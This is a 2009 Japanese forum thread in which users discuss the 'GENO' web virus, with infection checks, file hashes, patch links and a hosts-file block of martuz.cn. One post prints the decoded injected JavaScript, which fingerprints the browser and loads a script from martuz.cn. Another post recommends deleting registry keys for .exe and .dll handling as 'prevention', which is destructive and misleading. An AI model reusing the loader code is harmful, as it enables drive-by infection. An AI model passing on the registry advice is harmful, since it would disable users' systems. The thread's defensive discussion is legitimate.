GENOウイルススレ ★21

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
  (9.1.0)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
  (9.1.1↑,をインストールしてから↓を適用)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
  バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
■ FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
  swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
  そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

■ Vistaの人ははUACをONにする

★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/

GENOウイルススレ ★20
http://pc11.2ch.net/test/read.cgi/sec/1243016705/
2名無しさん@お腹いっぱい。:2009/05/26(火) 23:06:53
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
  http://www.btfree.info/file.php?action-get.html
  Code by: 790e3cc3feabad9
3名無しさん@お腹いっぱい。:2009/05/26(火) 23:07:37
Bsqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。


※従来のテンプレのcmd.exeによる確認は危険


★感染した場合
現状ではクリーンインストールするしかない
4名無しさん@お腹いっぱい。:2009/05/26(火) 23:08:20
うったえてやう
5名無しさん@お腹いっぱい。:2009/05/26(火) 23:08:20
糞テンプレ修正完了
6名無しさん@お腹いっぱい。:2009/05/26(火) 23:43:21
> ■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
これも間違いじゃなかったっけ? 9.1.1で修正された脆弱性はGENOウイルスとは無関係
> ■ adobe flashplayerを最新版に更新
>   http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だからこれじゃIEのFlash Playerが更新されないってば
7名無しさん@お腹いっぱい。:2009/05/27(水) 00:02:38
>>1
GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/← アフィリエイト(Amazon) ↓ソース

<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる
8名無しさん@お腹いっぱい。:2009/05/27(水) 02:21:46
-----------------------------
ActiveX (アクティブエックス)
JavaScript (ジャバスクリプト)
-----------------------------

どんな脆弱性があってもルーター(FW)と
この2つをOFF(無効)にすれば無敵になれる
9名無しさん@お腹いっぱい。:2009/05/27(水) 02:25:24
メールは

クロネコメールをつかえ
10名無しさん@お腹いっぱい。:2009/05/27(水) 02:26:47
ソフトはフリーソフトは使わず市販のソフトのみつかえ
11名無しさん@お腹いっぱい。:2009/05/27(水) 02:47:57
>>8
"無敵"ではない

自分が知ってる限りでも
・HTML解釈ミスによるクラッシュ(IE)
・HTML解釈ミスによる任意コードの実行(IE)←うろ覚えだが存在した筈
・IIS稼働環境+IFRAME←推測だが、IISのURIバグで進入され得る可能性がある
・JPEG解釈ミスによるクラッシュ・任意コードの実行(2ch専用ブラウザ、IE、DLファイル経由他)←一時有名になったGDIのバグ
確かGIFでも起きたはず

副作用なしのクラッシュくらいは余裕で起きるし、静的コンテンツの任意コード実行の脆弱性が残ってればいくらでも進入の危険はある
12名無しさん@お腹いっぱい。:2009/05/27(水) 05:48:27
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
起動しない
Asqlsodbc.chmのファイルサイズの確認を確認する
4.00 KB (4,096 バイト

見事に感染しています。
クリーンインストールしたいのですが、質問があります。
データをUSBに移そうとおもうのですが、移すファイルにGENOが入ってないか確かめたい
のですが、どうすればよいでしょうか?

13名無しさん@お腹いっぱい。:2009/05/27(水) 09:02:01
家族PCが感染してました

1.起動してもexplorerが起動しない(ユーザは一見何も出来ない)
2.CTRL+ALT+DELでタスクマネージャー立ち上げて新しいタスク実行
3.CMD起動
4.regedit.exe > 起動しない

regedit.exe互換ソフトなんてありましたっけ?
14名無しさん@お腹いっぱい。:2009/05/27(水) 09:05:22
↑窓の杜にあっさりありました
  失礼しました

 まとめサイトみてもクリーンインストールばかりだったので
(そのほうが安全だけどね)
 対処療法例のひとつとして..


15名無しさん@お腹いっぱい。:2009/05/27(水) 10:29:27
>>14
対処療法にもなってないけどねw
16名無しさん@お腹いっぱい。:2009/05/27(水) 10:49:35
>>14
除去してねーしwww被害広げる前に、クリーンインストールしとけよ。
17名無しさん@お腹いっぱい。:2009/05/27(水) 11:02:47

中古パソコンとパソコンパーツの通販ショップGENO

www.geno-web.jp/


2chのコピペブログを徘徊してたらGENOのサイトが勝手に立ち上がってた
GENOリンクをクリックした覚えは無く沢山タブ開いてたからどこの何が原因か分かりません
こちらのPCに感染らしき症状は見られずここ一週間で2回発生
こんなことってあります?
18名無しさん@お腹いっぱい。:2009/05/27(水) 11:12:20
それマジで早急に精神科で見てもらった方がいいぞ
19名無しさん@お腹いっぱい。:2009/05/27(水) 11:25:07
>>17
勝手に広告のウィンドウが開くのと同じ仕組みを利用して
感染させようとしている奴がいるのでしょ。
20名無しさん@お腹いっぱい。:2009/05/27(水) 11:56:14
クリックしたのを忘れてるんだろ
21名無しさん@お腹いっぱい。:2009/05/27(水) 11:56:51
疑わしい症状を発症したけれど…

勝手にAcrobatReaderが立ち上がってる。
メモリバカ食い。
CPU使用率90%
トレンド、マカフィー、シマンテックのHPが見れない。

最新定義でウィルススキャン→検知せず。
システムの復元で発症一か月前に復元。
再度ウィルススキャン→検知せず。
症状が回復する。

GENOに感染したと思うんだ!だが、システムの復元で回復してるんだ!
事後だけど感染の確認方法をしてみたら異常はないんだけれど、
念の為、PCをクリーンインストールした方がいいだろうか。。。
22名無しさん@お腹いっぱい。:2009/05/27(水) 12:04:49
力説するくらいならそのままで良いんじゃないの
多分大丈夫って意見が欲しい書き込みにしか見えないし
23名無しさん@お腹いっぱい。:2009/05/27(水) 12:08:18
>>21
前スレの最後の方読んだ?
システムの復元だけじゃsqlsodbc.chmのサイズが
感染前に戻らない(=ウイルス消えない)
経験談が出てるよ
念の為でなく、真面目に駆除したかったら
クリーンインスコしましょう

24名無しさん@お腹いっぱい。:2009/05/27(水) 12:11:38
それか、この際とことん実験する気あるなら
ホストファイルのlocalhost以外のip
全削除した状態で最新パターンファイルに更新した後
ウイルスチェックして削除できるか見てみてよ
報告よろしこ
25名無しさん@お腹いっぱい。:2009/05/27(水) 12:14:36
何がなんだかわからんやつは前消し
26名無しさん@お腹いっぱい。:2009/05/27(水) 12:16:06
訂正
× localhost以外
○ localhost以下の行(localhostの行は残す)
2721です。:2009/05/27(水) 12:25:22
今、前スレ読んできた…。
クリーンインストールしてみるよ。
ありがとん。
28名無しさん@お腹いっぱい。:2009/05/27(水) 12:57:32
結局この騒動はなんだったんだろう
29名無しさん@お腹いっぱい。:2009/05/27(水) 13:37:45
キャッシュを消しただけではどうにもならないということを学びました
30名無しさん@お腹いっぱい。:2009/05/27(水) 13:52:41
>>1
おい!!せっかくテンプレ修正してたのに!!


★5月27日現在、沈静化しています。


★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/


★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
  (9.1.0)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
  (9.1.1↑,をインストールしてから↓を適用)
  http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
  バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe

■ Operaでプラグイン、Javaをオフ(JavaScript単体では全く安全です。)
  1.[F12]を押す→[プラグインを有効にする]のチェックを外す)
  2.[F12]を押す→[javaを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。
  この方法だと便利なJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます
  さらに、QuickTimeなどの未知の脆弱性にも対処できます)

■ Vistaの人ははUACをONにする
31名無しさん@お腹いっぱい。:2009/05/27(水) 13:57:02
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★感染確認方法
@regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとレジストリエディタが立ち上がらない。
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。

Asqlsodbc.chmのファイルサイズの確認を確認する
 Windows XP,Windows 2000にて、
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes

※従来のテンプレのcmd.exeによる確認は危険
※従来のテンプレによるとWindows 2000ではsqlsodbc.chmが無いことになってるが
  .NET framework等にくっついてインスコされる
32名無しさん@お腹いっぱい。:2009/05/27(水) 13:58:38
★GENOウイルス感染からの復帰方法
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chm(http://www1.axfc.net/uploader/Sc/so/2780)に差し替え
33名無しさん@お腹いっぱい。:2009/05/27(水) 14:28:21
>>30
>>7
アフィチェッカー
34名無しさん@お腹いっぱい。:2009/05/27(水) 14:33:37
しつこい
35名無しさん@お腹いっぱい。:2009/05/27(水) 14:54:46
久々にきたら21になってて腰抜かした
36名無しさん@お腹いっぱい。:2009/05/27(水) 14:56:39
よく考えたら10分前にもきてた
37名無しさん@お腹いっぱい。:2009/05/27(水) 15:01:55
友達にどのプロバイダー使ってるか聞いたらさ、「教えぬ!」って言うわけよ。
ちょっとカチンと来たけど我慢してもう一度聞いたら、「だから教えぬ!」だってさ。
あんなに頑固な奴だとは思わなかったぜ
38名無しさん@お腹いっぱい。:2009/05/27(水) 15:25:30
ocn
39名無しさん@お腹いっぱい。:2009/05/27(水) 16:41:23
plala
40名無しさん@お腹いっぱい。:2009/05/27(水) 16:46:03
eooooooooooooooooooooooo
41名無しさん@お腹いっぱい。:2009/05/27(水) 16:46:58
■FireFox のリンク先読み機能を無効にする

about:config
network.prefetch-next → false
42名無しさん@お腹いっぱい。:2009/05/27(水) 16:49:43
テンプレみて感じた事
>>1
火狐厨乙
>>7
アフィ厨乙
>>30
Opera厨乙
43名無しさん@お腹いっぱい。:2009/05/27(水) 16:52:54
>>7
アフィチェッカーうぜぇ
GENOと共に死ね


ちなみにAmazonのアフィ

geno2chtc-22

geno2chtc
44名無しさん@お腹いっぱい。:2009/05/27(水) 16:55:27
推奨NGワード 「アフィ」 「チェッカー」 「厨」
45名無しさん@お腹いっぱい。:2009/05/27(水) 17:02:36
>>44
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::。:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::。::::::...... ...   --─-  :::::::::::::::::::: ..::::: . ..::::::::
:::::::::::::::::...... ....:::::::゜::::::::::..   (___ )(___ ) ::::。::::::::::::::::: ゜.::::::::::::
:. .:::::。:::........ . .::::::::::::::::: _ i/ = =ヽi :::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡::::   //[||    」  ||]  ::::::::::゜:::::::::: ...:: :::::
 :::::::::::::::::: . . . ..: :::: / ヘ | |  ____,ヽ | | :::::::::::.... .... .. .::::::::::::::
::::::...゜ . .:::::::::  /ヽ ノ    ヽ__/  ....... . .::::::::::::........ ..::::
:.... .... .. .     く  /     三三三∠⌒>:.... .... .. .:.... .... ..
:.... .... ..:.... .... ..... .... .. .:.... .... .. ..... .... .. ..... ............. .. . ........ ......
:.... . ∧∧   ∧∧  ∧∧   ∧∧ .... .... .. .:.... .... ..... .... .. .
... ..:(   )ゝ (   )ゝ(   )ゝ(   )ゝ無茶しやがって… ..........
....  i⌒ /   i⌒ /  i⌒ /   i⌒ / .. ..... ................... .. . ...
..   三  |   三  |   三  |   三 |  ... ............. ........... . .....
...  ∪ ∪   ∪ ∪   ∪ ∪  ∪ ∪ ............. ............. .. ........ ...
  三三  三三  三三   三三
 三三  三三  三三   三三
46名無しさん@お腹いっぱい。:2009/05/27(水) 17:04:00
ググるのは危ないって本当ですか?
一応ヤフーで検索してるけど不便で
47名無しさん@お腹いっぱい。:2009/05/27(水) 17:04:05
チェッカーをNG入りさせるとソースチェッカーとかのレスも消えるからやだ
48名無しさん@お腹いっぱい。:2009/05/27(水) 17:04:17
ここまで感染無し
49名無しさん@お腹いっぱい。:2009/05/27(水) 17:05:22
>>46
マジウソ
50名無しさん@お腹いっぱい。:2009/05/27(水) 17:05:26
気づいていないだけだったりして
51名無しさん@お腹いっぱい。:2009/05/27(水) 17:06:06
ググる先生が気になるなら念のため、先読み無効にしておけば問題なし
52名無しさん@お腹いっぱい。:2009/05/27(水) 17:17:50
sqlsodbc.chmのファイルサイズ確認って、
このファイル名で検索して出てきたサイズ見るだけじゃダメなの?
53名無しさん@お腹いっぱい。:2009/05/27(水) 17:19:34
>>49>>51
>>41の対策しました、ありがとうございます
54名無しさん@お腹いっぱい。:2009/05/27(水) 17:22:00
検索でやってみた。 

sqlsodbc.chm

サイズ 49.5 KB (50,727 バイト)

ディスク上のサイズ 52.0 KB (53,248 バイト)
55名無しさん@お腹いっぱい。:2009/05/27(水) 17:31:55
つまり検索では確認手段として十分とは言えないって事なのか
56名無しさん@お腹いっぱい。:2009/05/27(水) 17:32:34
どうして「従来のテンプレのcmd.exeによる確認は危険」なんですか?
もう何度かやったんですけど…
57名無しさん@お腹いっぱい。:2009/05/27(水) 17:36:40
sqlsodbc.ch_

BASHO=I386

COPY

SYSTEM32

RENAME

sqlsodbc.chm

RESTART
58名無しさん@お腹いっぱい。:2009/05/27(水) 18:12:27
「姿を変えて検出回避」「攻撃サイトは閉鎖」、最新Webウイルスの詳細
シマンテックが緊急説明会、「別の攻撃サイトが出現する恐れあり」
http://itpro.nikkeibp.co.jp/article/NEWS/20090526/330708/

特に目新しい情報はなさそうだけど貼っとく
59名無しさん@お腹いっぱい。:2009/05/27(水) 18:20:39
アフィリンク復活させやがった
shine
60名無しさん@お腹いっぱい。:2009/05/27(水) 18:23:22
予防策
レジストリエディタを開いて、以下のキーを全て削除して、再起動
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
上記のキーはウィルス・スパイウェアを活動させます
61名無しさん@お腹いっぱい。:2009/05/27(水) 18:23:45
せっかくテンプレから外してたのに
62名無しさん@お腹いっぱい。:2009/05/27(水) 18:23:59
コピペでクレジットの情報とかも抜かれるって読んだんだけど本当?
インターネットウォッチとかの記事読む限りFTP関係しか書いてないんだが
63名無しさん@お腹いっぱい。:2009/05/27(水) 18:24:44
しらん
64名無しさん@お腹いっぱい。:2009/05/27(水) 18:24:45
>>54
俺もサイズ 49.5 KB (50,727 バイト)だったけど大丈夫ってことだよな?
65名無しさん@お腹いっぱい。:2009/05/27(水) 18:29:17
>>64 調べたが問題ないみたいだ たぶんww
66名無しさん@お腹いっぱい。:2009/05/27(水) 18:31:39
>>64
今後の予防に
>>60を実行してください
67名無しさん@お腹いっぱい。:2009/05/27(水) 18:34:48
>>54
容量的には正常
更に気になるならハッシュ値の確認をどうぞ
68名無しさん@お腹いっぱい。:2009/05/27(水) 18:36:13
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
69名無しさん@お腹いっぱい。:2009/05/27(水) 18:36:48
もういいや
後はAVGちゃんが何とかしてくれるに決まってるもん
70名無しさん@お腹いっぱい。:2009/05/27(水) 19:12:36
すまん教えてくれ。
そもそもGENOのサイトが改竄されたのは、ハッキングなの?
71名無しさん@お腹いっぱい。:2009/05/27(水) 19:17:45
サイトの管理者がネットでいかがわしい所に行ったPCで踏んできたんじゃない?
72名無しさん@お腹いっぱい。:2009/05/27(水) 19:18:31
じゃなくて 踏んできたPCでサイト更新したからじゃない?
73名無しさん@お腹いっぱい。:2009/05/27(水) 19:23:40
踏んできたPCで更新かけても、
ファイル転送がSFTPだったら暗号とけなくて
ウイルス涙目?
74名無しさん@お腹いっぱい。:2009/05/27(水) 19:50:30
>>56
GENOじゃない他のウイルスでそれ起動させると悪化するやつがあるとかってどっかのスレで見た
自分もよく知らないけど健康なPCなら起動させても問題ないんじゃないの
75名無しさん@お腹いっぱい。:2009/05/27(水) 20:03:02
Returnilを使ってればGENOを踏んで感染しても、
OSを再起動した時点で「感染しなかった事になる」
再起動後、パスワードを変更するだけでおk。


【仮想化】Returnil Virtual System【仮想化】
http://pc11.2ch.net/test/read.cgi/sec/1202337108/
76名無しさん@お腹いっぱい。:2009/05/27(水) 20:06:14
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
両方とも起動

Asqlsodbc.chmのファイルサイズの確認を確認する 
↑いまこれを確認してるのですが、
cmd.exeの真っ黒い画面に「dir C:\WINDOWS\system32\sqlsodbc.chm」と打ち込んでも
ファイルが見つかりませんと出ます。

Vistaだからでしょうか?
77名無しさん@お腹いっぱい。:2009/05/27(水) 20:12:25
>>70
現時点でGENOからの説明は一切ないっぽい。
もし犯人がショッピングサイトだと知っていてハック&改竄したのだとしたら、
それこそクレカ情報とか心配だな。
78名無しさん@お腹いっぱい。:2009/05/27(水) 20:22:48
GENOウイルス騒動で再考するマルウェア対策 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/27/news007.html

 感染活動による攻撃者の狙いは、
ユーザーを詐欺サイトへ誘導する目的で検索エンジンの結果を書き換えたり、
不正広告を配信したりすることや、詐欺的ソフトのインストール、
個人情報の盗難、バックドアのインストールなどがあるとみられる。
いずれの場合でも、金銭やボットマシンの確保といったサイバー犯罪の流行に沿ったものである可能性が高い。

 シマンテックセキュリティレスポンスの林薫主任研究員は、
「こうした攻撃では自動化された攻撃ツールを使われるのが一般的だが、
今回は人海戦術によってち密な計画で仕掛けられた可能性がある」と推測する。
79名無しさん@お腹いっぱい。:2009/05/27(水) 20:25:43
GENO伝説ここに始まる。一気に全国区へ。
80名無しさん@お腹いっぱい。:2009/05/27(水) 20:37:32
>>56
その書き込みをどこで見たのかわからんがWikiに載ってるまま指摘ないんだし問題ないよな…?
というかかなりの数の人がcmd.exeで確認しただろうしそれが危険だとしたらやばいと思うが
81名無しさん@お腹いっぱい。:2009/05/27(水) 20:37:48
本当にこのGENOウィルスは豚インフルの感染の広がりと同期してるんじゃないか
また冬に再流行とか止めてくれよ
82名無しさん@お腹いっぱい。:2009/05/27(水) 20:56:02
Vista使えよ馬鹿?
8356:2009/05/27(水) 20:56:52
>>74
>>80
そうですか。ありがとうございます。
今は大丈夫ですが、>>3>>31に書いてあったので気になりました。
84名無しさん@お腹いっぱい。:2009/05/27(水) 20:58:45
ウイルスじゃなくても情報が漏れることあります

【情報流出】楽天、利用者のメールアドレスを含む個人情報を「1件10円」でダウンロード販売していることが判明
ttp://tsushima.2ch.net/test/read.cgi/newsplus/1243424409/
85名無しさん@お腹いっぱい。:2009/05/27(水) 20:58:47
xp→windows7

vistaはスルー
86名無しさん@お腹いっぱい。:2009/05/27(水) 20:59:44
>>1はなんでわざわざ古いテンプレを使うの?
アホなの?バカなの?死ぬの?
87名無しさん@お腹いっぱい。:2009/05/27(水) 21:04:51
>>84
今更、何を
楽天では昔からのデフォ仕様(暗黙の了解、自己責任)
っていうか、ネットのショッピングモール自体がどこも似たような事をやってる
まー、通販ではカード決済は出来るだけ避けろってこった
88名無しさん@お腹いっぱい。:2009/05/27(水) 21:10:03
「通常購入データ.csv」「オークションデータ.csv」「プレゼントデータ.csv」「共同購入データ.csv」「資料請求データ.csv」
「商品問合せデータ.csv」となっており、名字・名前・郵便番号・住所・電話番号・ニックネーム・
メールアドレス・クレジットカード番号・クレジットカード名義人・クレジットカード有効期限といった各種個人情報が記載されています。

ネット通販だけでこれだけ情報売られるのか‥
89名無しさん@お腹いっぱい。:2009/05/27(水) 21:14:13
アマゾンもアウトかしら
タダで渡して売ってないから法的にはセーフ?
このタイミングでこの告発ってのは厚労省に睨まれた結果なんだろうけど
90名無しさん@お腹いっぱい。:2009/05/27(水) 21:14:57
>>76
vistaは sqlsodbc.chm の場所が違います。

C:\Windows\Help\mui\0411\sqlsodbc.chm

気が済むまでチェックするよろし。
91名無しさん@お腹いっぱい。:2009/05/27(水) 21:43:24
>>66
初心者はレジストリいじるなって言われたんですが大丈夫でしょうか
92名無しさん@お腹いっぱい。:2009/05/27(水) 22:04:10
>>91
いじらない方がいいと思う
93名無しさん@お腹いっぱい。:2009/05/27(水) 22:05:50
>>92
了解です、ありがとうございます
94名無しさん@お腹いっぱい。:2009/05/27(水) 22:09:48
普段使ってるアカウントの方は壷使えなくなった上すごい重くてネットできない
だから別のアカウント使ってるんだけどタスクマネージャ見てたらプロセスがやけに少なくなってる
7つしかないよ。さっきはこれの4倍くらいあったのに

クリーンインストールしたいけどネットの設定を戻せる気がしない
95名無しさん@お腹いっぱい。:2009/05/27(水) 22:27:00
>>85
勘違いする初心者が続出しそうな予感
96名無しさん@お腹いっぱい。:2009/05/27(水) 22:34:59
a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)
&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)
&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
97名無しさん@お腹いっぱい。:2009/05/27(水) 22:37:04
>96はデコードしたスクリプト
NT6とChromeは特別扱いらしい
98名無しさん@お腹いっぱい。:2009/05/27(水) 22:38:44
いまさらいきなりなに
99名無しさん@お腹いっぱい。:2009/05/27(水) 22:53:09
16日にはデコードされていたスクリプト
見た瞬間分かるような情報
いったい何がしたかったのか
100名無しさん@お腹いっぱい。:2009/05/27(水) 23:00:50
fc2、記事書いて全ユーザーにメールで注意したみたいだ
ついでにFTPの仕様も変えるみたい
http://blog.fc2.com/info/blog-entry-378.html
http://blog.fc2.com/info/blog-entry-379.html
101名無しさん@お腹いっぱい。:2009/05/27(水) 23:01:09
>>89
アマゾンはほしいものリスト経由の個人情報流出事件が記憶に新しい
yahooも当然、前歴あり
ネット通販は、ある程度の流出は仕方ないくらいの認識じゃないとやっていけないよ
102名無しさん@お腹いっぱい。:2009/05/27(水) 23:22:45
vistaでよかったわ
103名無しさん@お腹いっぱい。:2009/05/27(水) 23:27:37
vistaでよかったと思える時が来るなんて思わんかった
104名無しさん@お腹いっぱい。:2009/05/27(水) 23:34:41
なんだか可哀そうだぞw
105名無しさん@お腹いっぱい。:2009/05/27(水) 23:39:02
>100

テンプレートが改竄されてた事には触れてないな
106名無しさん@お腹いっぱい。:2009/05/28(木) 00:17:41
関係ないけど、いまだに改竄を一瞬「かいそ」と読んでしまう。

わかってるねん、わかってるねんで?
107名無しさん@お腹いっぱい。:2009/05/28(木) 00:26:16
関係無いけど、きじゃくせいって「既知の脆弱性」の略だと思ってた

…どうした?
108名無しさん@お腹いっぱい。:2009/05/28(木) 00:32:28
>しかもさまざまな亜種が存在、アンチウイルスソフトのアップデートでの完全対応は難しいのが現状です。しかし、不正侵入検知機能(IPS)を備えた統合セキュリティソフトでは、これらの被害を防げるのです。
断言しているけど大丈夫か?
tp://shop.vector.co.jp/service/special/security/
109名無しさん@お腹いっぱい。:2009/05/28(木) 00:39:12
>>108
なんだ知らなかったよ
JSをオフらなくてもソフトのIPSが防いでくれてたのか
一応ウイルスにかかった形跡もなかったから問題ないな
110名無しさん@お腹いっぱい。:2009/05/28(木) 00:43:59
ところでavastとaviraもIPSって付いているのか?
111名無しさん@お腹いっぱい。:2009/05/28(木) 00:50:53
>>100
FC2のブログとHPのサービス他4つ利用してるけどメール来ない…
112名無しさん@お腹いっぱい。:2009/05/28(木) 00:53:44
>>110
ウイルスセキュリティゼロは付いていたっぽい
防御機能してたか知らんけど…
113名無しさん@お腹いっぱい。:2009/05/28(木) 01:12:28
Vista+ UACにして適当な>>108を入れて
FIREFOX+NOSCRIPT+先読み無効
まめなうpデートで超おkなん?

でもショップGENOはどうやってウイルスにかかったんやろ?
アドベのアップもしなかったくらいだからノーガードやったかもな
114名無しさん@お腹いっぱい。:2009/05/28(木) 01:22:19
>>113
しらねーよw
GENOはキャッシュ消せば治るとほざいてたくらいだから無防備仕様じゃろw
115名無しさん@お腹いっぱい。:2009/05/28(木) 01:23:40
海外のeroticサイトでもみてたんだろか
116名無しさん@お腹いっぱい。:2009/05/28(木) 01:24:04
>>111が何気にゲンキがない
病気やったんやろか
117名無しさん@お腹いっぱい。:2009/05/28(木) 01:30:28

dフルエンザにかかっても2日以内に
タマゴ酒のめば直る
